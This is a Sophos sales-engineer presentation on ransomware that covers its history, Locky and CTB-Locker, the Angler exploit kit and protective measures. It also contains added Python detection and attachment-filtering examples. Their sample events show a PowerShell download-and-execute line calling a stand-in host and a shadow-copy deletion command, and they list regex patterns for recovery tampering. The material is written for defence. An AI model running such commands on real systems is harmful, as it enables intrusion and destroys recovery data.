Ransomware: is there any way you can protect yourself?
Joanna Wziątek-Łados, Sales Engineer, Sophos
What we're going to cover
• Ransomware origins
• Anatomy of a ransomware attack
• The latest ransomware: introducing Locky and its friends
• Why these attacks are so successful
• Practical steps to protect your organization from ransomware threats
• How Sophos can help
History of Ransomware
• The first known ransomware was found in 1989: the AIDS Trojan, also known as PC Cyborg.
• An infected computer would display a message to the user that one of their programs had expired and that they needed to pay $189 to have it restored.
• The creator was eventually caught and the ransomware genre went underground for several years, though it reappeared briefly in 2005 and 2006.
CryptoLocker
• With the rise of CryptoLocker in 2013, a criminal gang first demonstrated the ability to reliably combine remote encryption with remote extortion on a mass scale.
• It not only showed how encrypting ransomware could be made to work: it also showed just how lucrative this malware business could be.
• According to US Department of Justice filings, CryptoLocker earned $27,000,000 for its owners in just two months.
• CryptoLocker was taken down by law enforcement authorities in May 2014, and for the next several months there was a significant reduction in the prevalence of ransomware.
Growth
• How many percent has ransomware increased between 2014 and 2015?
• Answer: about 170%. The reason for the rise is simple: ransomware works.
• Data so far shows that this figure for 2016 will at least double.
Facts about encryption
• CryptoLocker normally uses AES 256-bit encryption for the files themselves; in later versions this was changed to AES 128-bit. The key length makes no practical difference to the victim: each per-file AES key is itself encrypted with a 2048-bit RSA public key fetched from the attacker's server, so the files cannot be recovered without the private key that only the attacker holds.
• File types that usually are encrypted:
*.3fr, *.accdb, *.ai, *.arw, *.bay, *.cdr, *.cer, *.cr2, *.crt, *.crw, *.h, *.dbf, *.dcr, *.der, *.dng, *.doc, *.docm, *.docx, *.dwg, *.dxf, *.dxg, *.eps, *.erf, *.indd, *.jpe, *.jpg, *.kdc, *.mdb, *.mdf, *.mef, *.mrw, *.nef, *.nrw, *.odb, *.odm, *.odp, *.ods, *.odt, *.orf, *.p12, *.p7b, *.p7c, *.pdd, *.pef, *.pem, *.pfx, *.ppt, *.pptm, *.pptx, *.psd, *.pst, *.ptx, *.r3d, *.raf, *.raw, *.rtf, *.rw2, *.rwl, *.srf, *.srw, *.wb2, *.wpd, *.wps, *.xlk, *.xls, *.xlsb, *.xlsm, *.xlsx
• Note that the list targets documents, databases, photos, CAD drawings and, tellingly, certificates and private keys (*.cer, *.crt, *.der, *.pem, *.pfx, *.p12): the malware goes after whatever the victim will pay to get back.
2 main vectors of attack
• Spam (via social engineering)
○ Seemingly plausible sender
○ Has attachment e.g. invoice, parcel delivery note
○ The attachment contains an embedded macro
○ When the attachment is opened the macro downloads and then executes the ransomware payload
○ Used by Locky, TorrentLocker, CTB-Locker
• Exploit kits
○ Black market tools used to easily create attacks that exploit known or unknown vulnerabilities (zero-day)
○ Client-side vulnerabilities, usually targeting the web browser and its plug-ins
○ Exploit kits such as Angler have been used to deliver CryptoWall, TeslaCrypt, CrypVault and ThreatFinder
Anatomy of a ransomware attack
1. Installation via an exploit kit or spam with an infected attachment. Once installed, the ransomware modifies registry keys (typically a Run key, so that it survives a reboot).
2. Contact with the command & control server of the attacker. The ransomware sends information about the infected computer to the C&C server and downloads an individual public key for this computer; the matching private key never leaves the attacker's system.
3. Encryption of assets. Certain files are then encrypted on the local computer and on all accessible network drives. The files are encrypted with symmetric keys that are in turn wrapped with this public key. Automatic backups of the Windows OS (Volume Shadow Copies) are often deleted, e.g. with vssadmin, to prevent data recovery.
4. Ransom demand. A message appears on the user's desktop, explaining how a ransom (often in the form of bitcoins) can be paid within a time frame of e.g. 72 hours to enable decryption of the data with the private key that only the attacker's system has access to.
5. And gone. The ransomware will then delete itself, leaving just the encrypted files and ransom notes behind.
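Each of the steps above leaves a trace in host telemetry that a defender can watch for. The Python below is an added example written for this page; it is not Sophos code and not part of the original deck. It runs a few behavioural rules over constructed Sysmon-style events (process creation, file creation, registry value set; every path, SID, host name and command line is made up) and raises an alert for an Office application spawning a script host (step 1 via the macro vector), a Run-key write (step 1 persistence), shadow-copy or recovery tampering (step 3) and a burst of files written with known ransomware extensions (step 3). The rule names, event field names and the extension list are the example's own assumptions.

```python
import re
from collections import Counter

# Constructed Sysmon-style events for this example (not real logs). Sysmon EventID
# 1 = process creation, 11 = file create, 13 = registry value set. Every path,
# SID, host name and command line below is made up.
SAMPLE_EVENTS = [
    {"event_id": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "powershell -w hidden -ep bypass IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://dropper.invalid/ld')"},
    {"event_id": 11,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "target_filename": r"C:\Users\bob\AppData\Local\Temp\~WRD0001.tmp"},
    {"event_id": 13,
     "image": r"C:\Users\bob\AppData\Local\Temp\svchost.exe",
     "target_object": r"HKU\S-1-5-21-1-1-1-1001\Software\Microsoft\Windows\CurrentVersion\Run\Locky"},
    {"event_id": 1,
     "image": r"C:\Windows\System32\vssadmin.exe",
     "parent_image": r"C:\Users\bob\AppData\Local\Temp\svchost.exe",
     "command_line": "vssadmin.exe Delete Shadows /All /Quiet"},
] + [
    {"event_id": 11,
     "image": r"C:\Users\bob\AppData\Local\Temp\svchost.exe",
     "target_filename": rf"\\fileserver\finance\Q1\report{i}.xlsx.locky"}
    for i in range(6)
]

# Command lines that destroy the recovery options mentioned on the slide (shadow
# copies, Windows recovery, the backup catalog). Rule names are this example's own.
RECOVERY_TAMPER = [
    ("shadow_copy_deletion", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("shadow_copy_deletion", re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("recovery_disabled", re.compile(r"bcdedit(\.exe)?\s.*recoveryenabled\s+no", re.I)),
    ("backup_catalog_deleted", re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I)),
]
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
# Extensions used by Locky and TeslaCrypt variants; extend from current threat intel.
RANSOM_EXTS = {".locky", ".ecc", ".ezz", ".exx", ".micro", ".vvv", ".encrypted"}


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _ext(path):
    name = _basename(path)
    return name[name.rfind("."):] if "." in name else ""


def detect(events, burst_threshold=5):
    """Run the rules over a sequence of events and return a list of alert dicts."""
    alerts = []
    burst = Counter()  # encrypted-looking files written, counted per process image
    for ev in events:
        image = ev.get("image", "")
        if ev["event_id"] == 1:
            cmd = ev.get("command_line", "")
            for rule, pattern in RECOVERY_TAMPER:
                if pattern.search(cmd):
                    alerts.append({"rule": rule, "image": image, "evidence": cmd})
            # The macro vector: an Office process launching a script or LOLBin host.
            if (_basename(ev.get("parent_image", "")) in OFFICE_APPS
                    and _basename(image) in SCRIPT_HOSTS):
                alerts.append({"rule": "office_spawned_script_host",
                               "image": image, "evidence": cmd})
        elif ev["event_id"] == 13:
            target = ev.get("target_object", "")
            if RUN_KEY.search(target):
                alerts.append({"rule": "run_key_persistence",
                               "image": image, "evidence": target})
        elif ev["event_id"] == 11:
            if _ext(ev.get("target_filename", "")) in RANSOM_EXTS:
                burst[image] += 1
                if burst[image] == burst_threshold:  # alert once, when the burst starts
                    alerts.append({"rule": "mass_encrypted_file_writes", "image": image,
                                   "evidence": f"{burst_threshold} files with ransomware extensions"})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert['rule']:28} {_basename(alert['image']):16} {alert['evidence']}")
```

The shadow-copy rule is the one worth acting on automatically: legitimate software almost never runs `vssadmin Delete Shadows`, and by the time it fires the encryption loop (step 3) is usually already running, so the response should be to isolate the host rather than just raise a ticket. The file-burst rule fires on the fifth matching write so that the analyst sees one alert per process instead of one per file.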
Ransom demands

Paying ransoms
• Payment is made in Bitcoins
• Instructions are available via Tor
• The ransom increases the longer you take to pay
• On payment of the ransom, the private decryption key is provided so you can decrypt your files. The public key was on your machine all along; it is the private half, held only by the attacker, that is being sold back to you.
Common ransomware: Locky and friends

Locky: the new kid on the block
• Nickname of a new strain of ransomware, so called because it renames all your important files so that they have the extension .locky
• Ransoms vary from BTC 0.5 to BTC 1.00 (1 BTC was worth about $400/£280 at the time of this presentation, early 2016)
• Started hitting the headlines in early 2016
• Wreaking havoc with at least 400,000 machines affected worldwide
A common Locky attack
• You receive an email containing an attached document.
○ The document looks like gobbledegook.
○ The document advises you to enable macros "if the data encoding is incorrect".
○ The criminals want you to click on the 'Options' button at the top of the page (the Office security bar that enables the embedded macro).
• Once you click Options and enable the content, the macro runs, downloads Locky and starts to execute it on your computer.
• As soon as it is ready to ask you for the ransom, it changes your desktop wallpaper.
• The format of the demand varies, but the results are the same.
CTB-Locker
• Peculiarity: business model based on affiliations
○ Infections are conducted by 'partners' who receive in return a portion of the takings
○ Enables faster spreading of malicious code
○ Approach notably used in the past by Fake-AV
• The cybercrooks offer the option of a monthly payment
• Has also been widely distributed by the Rig and Nuclear exploit kits
• As with TorrentLocker, the majority of infections have started via spam campaigns
CTB-Locker variant that attacks websites
• Same name as the ransomware that attacks Windows computers
• Written in PHP
• First attack in the UK on 12th February 2016
• Already many hundreds of sites have been attacked
• Attacks websites by encrypting all files in their repositories
• A password-protected 'shell' is installed on most of the affected sites, allowing attackers to connect to the server(s) via a backdoor
Angler: an all-too-well-known exploit kit
• Grown in notoriety since mid 2014
○ The payload is stored in memory and the disk file is deleted
○ Detects security products and virtual machines
○ Ability to spread many infections: banking Trojans, backdoors, rootkits, ransomware
• Easy to use
○ Doesn't require any particular technical competence
○ Available for a few thousand USD on the Dark Web
Angler's evolution into the dominant exploit kit
(Chart covering Sep 2014, Jan 2015 and May 2015; image not reproduced in this text.)
Chain of infection for Angler exploit kits
1. The victim accesses a compromised web server through a vulnerable browser
2. The compromised web server redirects the connection to an intermediary server
3. In turn, the intermediary server redirects the connection to the attacker's server which hosts the destination page of the exploit kit
4. The destination page looks for vulnerable plug-ins (Java, Flash, Silverlight) and their version numbers
5. If a vulnerable browser or plugin is detected the exploit kit releases its payload and infects the system.
Why these attacks are so successful

Why are these attacks so successful? Professional attack technology
• Highly professional approach, e.g. usually provides the actual decryption key after payment of the ransom
• Skillful social engineering
• Hide malicious code in technologies that are permitted in many companies, e.g. Microsoft Office macros, JavaScript, VBScript, Flash…
Why are these attacks so successful? Security weaknesses in the affected companies
• Inadequate backup strategy
• Updates and patches are not implemented swiftly enough
• Dangerous user/rights permissions: more than they need
• Lack of user security training
• Security systems are not implemented or used correctly
• Lack of IT security knowledge
• Conflicting priorities: security vs productivity concerns
Practical steps to protect against ransomware

Best practices: do this NOW!
1. Backup regularly and keep a recent backup copy off-site (and offline: ransomware encrypts every drive it can reach, including mapped backup shares).
2. Don't enable macros in document attachments received via email.
3. Be cautious about unsolicited attachments.
4. Don't give yourself more login power than you need.
5. Consider installing the Microsoft Office viewers.
6. Patch early, patch often.
7. Configure your security products correctly.
Security solution requirements
As a minimum you should:
• Deploy antivirus protection
• Block spam
• Use a sandboxing solution
• Block risky file extensions (JavaScript, VBScript, CHM etc.)
• Block password-protected archive files (they cannot be inspected at the gateway)
• Use URL filtering (block access to C&C servers)
• Use HTTPS filtering
• Use HIPS (host intrusion prevention system)
• Activate your client firewalls
• Use a whitelisting solution
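Two of the requirements above, blocking risky attachment extensions and blocking password-protected archives, together with the macro-enabled attachment described in the Locky slide, can be expressed as one attachment policy. The Python below is an added example for this page, not Sophos code and not part of the original deck. It classifies an attachment by extension, descends into ZIP archives (refusing any archive whose entries are marked encrypted, since their content cannot be inspected), and flags OOXML Office documents that carry a vbaProject.bin macro container. The sample attachments are constructed in memory; the blocked-extension list, nesting limit and function names are the example's own choices. Legacy binary .doc files, which Locky actually used, are OLE compound files and would need an OLE parser such as oletools rather than zipfile.

```python
import io
import posixpath
import zipfile

# Policy lists for this example. The slide names JavaScript, VBScript and CHM; the
# rest are other script hosts and executables commonly mailed as "invoices".
BLOCKED_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".chm", ".hta",
                ".exe", ".scr", ".jar", ".bat", ".cmd", ".ps1", ".lnk"}
ARCHIVE_EXTS = {".zip"}          # OOXML is ZIP too, but it is handled as a document
OOXML_EXTS = {".docx", ".docm", ".dotm", ".xlsx", ".xlsm", ".xltm", ".pptx", ".pptm"}


def _ext(name):
    base = posixpath.basename(name.replace("\\", "/")).lower()
    return base[base.rfind("."):] if "." in base else ""


def _has_vba_project(data):
    """OOXML documents are ZIP containers; macros live in a vbaProject.bin part."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            return any(posixpath.basename(n).lower() == "vbaproject.bin"
                       for n in z.namelist())
    except zipfile.BadZipFile:
        return False


def assess(filename, data, depth=0, max_depth=3):
    """Return ('block' | 'allow', reason) for one attachment, descending into ZIPs."""
    ext = _ext(filename)
    if ext in BLOCKED_EXTS:
        return "block", f"risky extension {ext}: {filename}"
    if ext in OOXML_EXTS and _has_vba_project(data):
        return "block", f"Office document carries a VBA project: {filename}"
    if ext in ARCHIVE_EXTS:
        if depth >= max_depth:
            return "block", f"archive nested deeper than {max_depth}: {filename}"
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as z:
                for info in z.infolist():
                    # Bit 0 of the general-purpose flag marks an encrypted entry. The
                    # content cannot be inspected, so the archive is blocked outright.
                    if info.flag_bits & 0x1:
                        return "block", f"password-protected archive: {filename}"
                    verdict, reason = assess(info.filename, z.read(info), depth + 1, max_depth)
                    if verdict == "block":
                        return "block", f"inside {filename}: {reason}"
        except zipfile.BadZipFile:
            return "block", f"malformed archive: {filename}"
    return "allow", f"no policy match: {filename}"


def _zip(entries):
    """Build an in-memory ZIP from {name: bytes-or-str}; used only to construct samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, content in entries.items():
            z.writestr(name, content)
    return buf.getvalue()


# Constructed attachments (not real samples). The OOXML parts are minimal stubs.
SAMPLE_ATTACHMENTS = {
    "invoice_2016.docx": _zip({"[Content_Types].xml": "<Types/>",
                               "word/document.xml": "<w:document/>"}),
    "invoice_2016.docm": _zip({"[Content_Types].xml": "<Types/>",
                               "word/document.xml": "<w:document/>",
                               "word/vbaProject.bin": b"\xd0\xcf\x11\xe0 stub"}),
    "parcel_note.zip": _zip({"parcel_note.pdf.js": "new ActiveXObject('WScript.Shell');"}),
    "holiday_photos.zip": _zip({"holiday/IMG_0001.jpg": b"\xff\xd8\xff"}),
    "report.pdf": b"%PDF-1.4 stub",
}


def scan(attachments):
    """Map each attachment name to its verdict."""
    return {name: assess(name, data)[0] for name, data in attachments.items()}


if __name__ == "__main__":
    for name, data in SAMPLE_ATTACHMENTS.items():
        print("%-5s %s" % assess(name, data))
```

Two design points matter here. The double extension "parcel_note.pdf.js" is caught because the policy looks at the last extension, which is the one Windows acts on, not the one the user reads. And a VBA part is checked regardless of whether the extension is .docx or .docm, because the extension is attacker-controlled and Word opens either; the check is on the container's contents, not its name.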
Additional steps
• Employee awareness & training
○ Sophos IT Security Dos and Don'ts
○ Sophos Threatsaurus
• Segment the company network
○ NAC solutions ensure only known computers can access the network
○ Separate functional areas within a firewall, e.g. client and server networks
• Encrypt company data
○ It doesn't stop the ransomware but prevents damage caused by sensitive documents getting into the wrong hands
• Use security analysis tools
○ If an infection does occur, it's vital that the source is identified and contained ASAP.
How Sophos can help

Complete protection: Enduser and Network
Sophos Central manages both the Enduser and the Network products:
• Network: Next-Gen Firewall/UTM, Web Security, Email Security, Wireless Security
• Enduser: Next-Gen Endpoint Protection, Server Security, SafeGuard Encryption, Mobile Control
• Secure the Endpoint (PC/Mac): next-gen endpoint security to prevent, detect, investigate and remediate
• Secure the Mobile Device: secure smartphones and tablets just like any other endpoint
• Secure the Servers: protection optimized for server environments (physical or virtual): fast, effective, controlled
• Protect the Data: simple-to-use encryption for a highly effective last line of defense against data loss
• Secure the Perimeter: ultimate enterprise firewall performance, security, and control
• Secure the Web: advanced protection, control, and insights that's effective, affordable, and easy
• Secure the Email: email threats and phishing attacks don't stand a chance
• Secure the Wireless: simple, secure Wi-Fi connection
Security as a System
• Synchronized Security: integrated, context-aware security where Enduser and Network technology share meaningful information to deliver better protection
• Security must be comprehensive: the capabilities required to fully satisfy customer need
• Security can be made simple: platform, deployment, licensing, user experience
• Security is more effective as a system: new possibilities through technology cooperation
(Diagram: Next Gen Enduser Security and Next Gen Network Security linked by the Security Heartbeat, managed through Sophos Cloud and fed by SophosLabs; image not reproduced in this text.)
(Diagram: Sophos System Protector and its components: Malicious Traffic Detection, Application Tracking, Threat Engine, Application Control, Emulator, Device Control, Web Protection, IoC Collector, Live Protection, Security Heartbeat, HIPS/Runtime Protection, Reputation. These are fed by SophosLabs data: URL database, malware identities, HIPS rules, genotypes, file look-up, reputation, apps, spam, data control, peripheral types, anonymizing proxies, patches/vulnerabilities, whitelist. The Malicious Traffic Detection flow shown is: malicious traffic detected by the MTD rules, the application is interrupted, the administrator is alerted, and the compromise is recorded against user, system and file. Image not reproduced in this text.)
Sophos Sandstorm: Advanced Threat Defense Made Simple
How Sophos Sandstorm works
1. If the file has known malware it's blocked immediately. If it's otherwise suspicious, and hasn't been seen before, it will be sent to the sandbox for further analysis. When web browsing, users see a patience message while they wait.
2. The file is detonated in the safe confines of the sandbox and monitored for malicious behaviour. A decision to allow or block the file will be sent to the security solution once the analysis is complete.
3. A detailed report is provided for each file analyzed.
• Secure Web Gateway
• Secure Email Gateway
• Unified Threat Management
• Next-Gen Firewall
Questions?
© Sophos Ltd. All rights reserved.